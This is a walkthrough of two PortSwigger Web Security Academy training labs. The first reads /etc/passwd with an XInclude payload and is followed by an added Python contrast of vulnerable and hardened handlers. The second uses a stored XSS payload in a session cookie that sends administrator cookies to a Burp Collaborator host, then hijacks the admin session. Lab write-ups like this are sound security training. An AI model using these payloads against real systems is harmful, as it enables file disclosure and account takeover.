WebSecurityAcademy (PortSwigger) – Essential skills

Walk-through of the Essential skills lab on PortSwigger Web Security Academy.

Practitioner – Discovering vulnerabilities quickly with targeted scanning

This lab contains a vulnerability that enables you to read arbitrary files from the server. To solve the lab, retrieve the contents of /etc/passwd within 10 minutes.

Due to the tight time limit, we recommend using Burp Scanner to help you. You can obviously scan the entire site to identify the vulnerability, but this might not leave you enough time to solve the lab. Instead, use your intuition to identify endpoints that are likely to be vulnerable, then try running a targeted scan on a specific request. Once Burp Scanner has identified an attack vector, you can use your own expertise to find a way to exploit it.

  • On the Home page, click on View details for a product.
  • Click on Check stock.
  • Send the request to the Repeater module.
  • Highlight the productId parameter value (e.g. “1”), right-click and select Scan selected insertion points.
  • In the Dashboard tab, click on View details for the audit task.
  • Some issues are found, including an XML injection.
  • Right-click on the request and send it to the Repeater module.
POST /product/stock HTTP/1.1
...

productId=%3cokm%20xmlns%3axi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a%2f%2f<BURP COLLABORATOR ID>.oastify.com%2ffoo%22%2f%3e%3c%2fokm%3e&storeId=1

💡 Use the Hackvertor extension.

productId=<@urlencode><lal xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="https://oumg4w9ukj3wwv3lco02ewnx8oeg26qv.oastify.com"/></lal><@/urlencode>&storeId=1

Burp Collaborator receives a request. This looks like an XInclude attack (xi:include); see Exploiting XXE to retrieve files (PortSwigger) and the lab Practitioner – Exploiting XInclude to retrieve files.

POST /product/stock HTTP/1.1
...

productId=<@urlencode><lal xmlns:xi="http://www.w3.org/2001/XInclude"><foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo></lal><@/urlencode>&storeId=1
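To show in code what the scanner flagged here, an added example that is not part of this walk-through and not the lab's own back end (which the page does not show): a hypothetical Python stock-check handler that pastes productId straight into an XML document and then runs XInclude processing, beside a hardened version that allow-lists the value and builds the document through the ElementTree API. The file it reads is a constructed stand-in for /etc/passwd, and every function name is an assumption.

```python
import re
import tempfile
import xml.etree.ElementTree as ET
import xml.etree.ElementInclude as EI

XI_NS = "http://www.w3.org/2001/XInclude"

def stock_lookup_vulnerable(product_id: str) -> str:
    """Hypothetical buggy handler: pastes productId straight into the markup."""
    doc = f"<stockCheck><productId>{product_id}</productId><storeId>1</storeId></stockCheck>"
    root = ET.fromstring(doc)
    EI.include(root)  # XInclude processing resolves any smuggled xi:include element
    # Return everything under <productId>, including text pulled in by xi:include
    return "".join(root.find("productId").itertext())

def build_stock_doc(product_id: str) -> bytes:
    """Build the document via the API: the value is text, so '<' becomes '&lt;'."""
    root = ET.Element("stockCheck")
    ET.SubElement(root, "productId").text = product_id
    ET.SubElement(root, "storeId").text = "1"
    return ET.tostring(root)

def stock_lookup_hardened(product_id: str) -> str:
    """Allow-list the value first, then build and process the document safely."""
    if not re.fullmatch(r"[1-9][0-9]{0,8}", product_id):
        raise ValueError("invalid productId")
    root = ET.fromstring(build_stock_doc(product_id))
    EI.include(root)  # nothing to resolve: the document holds no xi:include element
    return "".join(root.find("productId").itertext())

def make_secret_file() -> str:
    """Constructed stand-in for /etc/passwd so the demo runs offline."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")
        return fh.name

def xinclude_payload(path: str) -> str:
    """Same shape as the lab payload above, pointed at the constructed file."""
    return (f'<lal xmlns:xi="{XI_NS}"><xi:include parse="text" '
            f'encoding="UTF-8" href="{path}"/></lal>')

def demo() -> dict:
    payload = xinclude_payload(make_secret_file())
    leaked = stock_lookup_vulnerable(payload)  # the file contents come back
    try:
        stock_lookup_hardened(payload)
        rejected = False
    except ValueError:
        rejected = True
    # Even without the allow-list, API construction neutralises the markup
    neutralised = b"<xi:include" not in build_stock_doc(payload)
    return {"leaked": leaked, "rejected": rejected, "neutralised": neutralised}
```

The leak only happens because the server both concatenates the raw value into markup and enables XInclude processing; removing either layer is enough, and the hardened version removes both.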

Practitioner – Scanning non-standard data structures

This lab contains a vulnerability that is difficult to find manually. It is located in a non-standard data structure. To solve the lab, use Burp Scanner’s Scan selected insertion point feature to identify the vulnerability, then manually exploit it and delete carlos. You can log in to your own account with the following credentials: wiener:peter

Click on My account and log in with credentials wiener:peter.

The session cookie has a format of “username:sessionid”.

GET /my-account?id=wiener HTTP/2
Host: <LAB ID>.web-security-academy.net
Cookie: session=wiener%3a<SESSION ID>
[...]

Highlight the username wiener, right-click and select Scan selected insertion point -> Add to task: Active scans. Go to the Dashboard and display all issues. The scanner finds a Cross-site scripting (stored) vulnerability on /my-account.

GET /my-account?id=wiener HTTP/2
Host: <LAB ID>.web-security-academy.net
Cookie: session='"><svg/onload=fetch`//<BURP COLLABORATOR ID>\.oastify.com`>:<SESSION ID>
[...]

Exfiltrate the administrator’s cookies. Note that the fetch function needs the parentheses to exfiltrate the cookies and that the “+” sign is URL-encoded. These two payloads work:

'"><svg/onload=fetch(`//<BURP COLLABORATOR ID>\.oastify.com?c=`%2bdocument.cookie)>
'"><svg/onload=import(`//<BURP COLLABORATOR ID>\.oastify.com?c=`%2bdocument.cookie)>

Send the payload using the Repeater module.

GET /my-account?id=wiener HTTP/2
Host: <LAB ID>.web-security-academy.net
Cookie: session='"><svg/onload=import(`//<BURP COLLABORATOR ID>\.oastify.com?c=`%2bdocument.cookie)>:<SESSION ID>
[...]

Burp Collaborator receives a request containing the administrator’s cookies.

GET /?c=session=administrator%3ag7APsdyA1ceMSXtKd5Mp143nZuvjN3uG;%20secret=DpJUnZzDABqNrgk2RNrxwXEpcSTEqGfe;%20session=administrator%3ag7APsdyA1ceMSXtKd5Mp143nZuvjN3uG HTTP/1.1
[...]

In your web browser, change the session cookie to the value below and refresh the page.

administrator%3ag7APsdyA1ceMSXtKd5Mp143nZuvjN3uG

You will now see the Admin panel menu. Delete user carlos to solve the lab.